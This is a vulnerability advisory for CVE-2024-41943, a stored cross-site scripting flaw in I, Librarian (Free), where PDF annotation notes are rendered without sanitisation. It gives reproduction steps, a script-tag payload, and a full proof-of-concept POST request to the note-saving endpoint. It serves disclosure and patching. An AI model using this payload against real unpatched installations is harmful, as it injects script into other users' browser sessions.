CVE-2024-41943

I, Librarian (Free) - Stored XSS

I, Librarian is an open-source version of a PDF managing SaaS. PDF notes are displayed on the Item Summary page without any form of validation or sanitation.

An attacker can exploit this vulnerability by inserting a payload in the PDF notes that contains malicious code or script. This code will then be executed when the page is loaded in the browser. The vulnerability was fixed in version 5.11.1.

Steps to Reproduce

1. Import a PDF file and navigate to its summary by clicking on the imported PDF file's name in the Items menu in the dashboard

2. Click on the "Pdf" button under the file's name in the top-side of the page to navigate to the file's preview

3. Click on the "Annotations" button in the top menu to save a comment containing an XSS payload such as: <script>alert(1)</script>

4. The stored XSS payload will be triggered any time a user visits the targeted PDF's summary.

Proof of Concept

POST /librarian/index.php/pdf/savenote HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1280
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://127.0.0.1:8080
Connection: keep-alive
Referer: http://127.0.0.1:8080/librarian/index.php/item
Cookie: IL=<cookie>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

note=%3Cscript%3Ealert(1)%3C%2Fscript%3E&pg=1&top=1&left=1&id=<pdf-id>&csrfToken=<token>

References

• https://github.com/mkucej/i-librarian-free

• https://nvd.nist.gov/vuln/detail/CVE-2024-41943

• https://github.com/mkucej/i-librarian-free/security/advisories/GHSA-h5hx-fm7f-2xmx

• https://i-librarian.net/